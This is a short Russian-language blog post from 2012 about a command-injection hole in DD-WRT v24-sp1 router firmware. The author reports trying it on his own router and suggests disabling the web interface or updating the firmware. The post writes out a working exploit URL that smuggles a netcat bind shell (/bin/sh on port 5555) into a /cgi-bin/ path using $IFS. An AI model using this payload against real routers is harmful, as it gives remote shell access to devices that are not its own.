allyourroutersarebelongtous

Sep 11, 2012 09:35

Кстати, и на старуху бывает проруха. В том плане что работает себе роутер с линухом на борту, есть не просит и вроде всё нормально. А оказывается его все кому не лень давно могут поиметь банальной строкой:
http://www.example.com/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh. Проверил на своём - порт открывается, цепляйся netcat'ом (с телнетом глюки возникают) и администрируй чего хочешь. Ну или прямо из браузера... благо вся магия в /cgi-bin/; остальное можно своё колбасить. Версия у меня конечно древняя - Firmware: DD-WRT v24-sp1 (07/27/08) std, та самая, которая Stable. А на сайте сейчас некий v24 preSP2 скачать предлагают для моей модели как recommended. Впрочем можно поступить проще если всё устраивает и работает, а потому шиться лениво - погасить веб-морду, оставить только управление по ssh.

з.ы. Сцылка на вкусняшку выцеплена здесь, via rsdn разумеется, куда без него.

dd-wrt, security, router, exploit, linux

Previous post Next post
Up